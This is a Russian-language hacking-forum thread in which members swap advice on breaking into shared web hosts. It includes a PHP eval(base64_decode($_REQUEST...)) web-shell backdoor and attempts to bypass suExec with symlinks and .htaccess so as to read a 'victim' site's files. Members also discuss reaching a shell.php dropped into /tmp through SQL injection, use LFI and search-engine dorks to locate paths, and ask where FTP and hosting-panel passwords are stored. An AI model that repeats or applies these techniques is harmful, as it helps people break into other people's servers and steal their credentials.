Старый 10.02.2012, 17:06   #1711
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

$code=твой_код_в_base64;
eval(base64_decode($_REQUEST[code]));
Ereeee вне форума   Ответить с цитированием
Старый 10.02.2012, 19:49   #1712
halk
 
Регистрация: 10.02.2012
Сообщений: 3
Репутация: 0
По умолчанию

Цитата:
Сообщение от Ereeee Посмотреть сообщение
$code=твой_код_в_base64;
eval(base64_decode($_REQUEST[code]));
не помогает никак чет а ссылку дам глянешь?
halk вне форума   Ответить с цитированием
Старый 11.02.2012, 00:21   #1713
Lostnull
 
Регистрация: 15.01.2012
Сообщений: 64
Репутация: 5
По умолчанию

В общем первый раз такое.
suExec+apache
1)ls -la /var/cpanel/ drwx--x--x root/root
/var/cpanel: Permission denied
cat /var/cpanel/cpanel.config
#### NOTICE ####
# After manually editing any configuration settings in this file,
и блабла блабла отображает.
WTF?
2) Читал, что можно обойти suExec (/proc), где можно покурить об этом?
Lostnull вне форума   Ответить с цитированием
Старый 11.02.2012, 15:05   #1714
Lostnull
 
Регистрация: 15.01.2012
Сообщений: 64
Репутация: 5
По умолчанию

Нашел ответ на свой вопрос в старой статье Elekt'a
Цитата:
У чмода есть одна маленькая тонкость. Наличие байта выполнения --x на директории позволяет пройти в нее! Прочитать ее мы не сможем, но, к примеру, вложенные директории и файлы могут иметь уже более демократичные права доступа.
Lostnull вне форума   Ответить с цитированием
Старый 11.02.2012, 20:02   #1715
Lostnull
 
Регистрация: 15.01.2012
Сообщений: 64
Репутация: 5
По умолчанию

Допустим у меня uid/gid/group 666
в httpd.conf
<Directory />
Options FollowSymLinks
Заливаю .htaccess вида Options +FollowSymLinks
Делаю ln -s /var/www/жертва/.htaccess /var/www/я/htdocs/bla/bla/test.txt
В итоге получаю символическую ссылку с правами root, по которой ясен я пройти/прочитать не могу.
Что я не так делаю?
p.s. я все про обход suexec.
Lostnull вне форума   Ответить с цитированием
Старый 12.02.2012, 02:06   #1716
FliP
 
Регистрация: 09.08.2010
Сообщений: 19
Репутация: -1
По умолчанию

подскажите плз по моему вопросу
через sql /tmp/
но на серваке больше не нашёл папки чтобы залить в сам сайт
файл через load_file /tmp/shell.php читается
как вот можно к нему подключится?
__________________
/home/jbdr/data/www/stopxaker.ru/includes/init.php
FliP вне форума   Ответить с цитированием
Старый 12.02.2012, 06:28   #1717
Ereeee
 
Аватар для Ereeee
 
Регистрация: 19.01.2012
Сообщений: 110
Репутация: 12
По умолчанию

FliP,
Через LFI. На сайте должна быть папка, скинь в ЛС, мб найду.
Ereeee вне форума   Ответить с цитированием
Старый 12.02.2012, 07:30   #1718
FliP
 
Регистрация: 09.08.2010
Сообщений: 19
Репутация: -1
По умолчанию

в том то и дело,что lfi нету
__________________
/home/jbdr/data/www/stopxaker.ru/includes/init.php
FliP вне форума   Ответить с цитированием
Старый 12.02.2012, 11:06   #1719
dumb
 
Регистрация: 01.10.2011
Сообщений: 63
Репутация: 1
По умолчанию

Ошибки тоже никакой нету?! Чтобы пути увидеть? Загугли на предмет "site:qwe.ru warning|include"
Ну или ищи конфиг апача! Да и лей в img cache tmp и т.д.
Хотя мне много раз попадался ресурс с правами мускул-рута - но кроме /tmp нифига нечиталось
dumb вне форума   Ответить с цитированием
Старый 12.02.2012, 11:26   #1720
FliP
 
Регистрация: 09.08.2010
Сообщений: 19
Репутация: -1
По умолчанию

да нет суть в том,что путь знаю,но ни одна найденная мною папка не позволяет записать файл
и ещё хотел задать вопрос,где хранятся пассы от proFTPD в shadow?
и где ещё хранятся пассы от ISPManager
__________________
/home/jbdr/data/www/stopxaker.ru/includes/init.php
FliP вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2020, Jelsoft Enterprises Ltd. Перевод: zCarot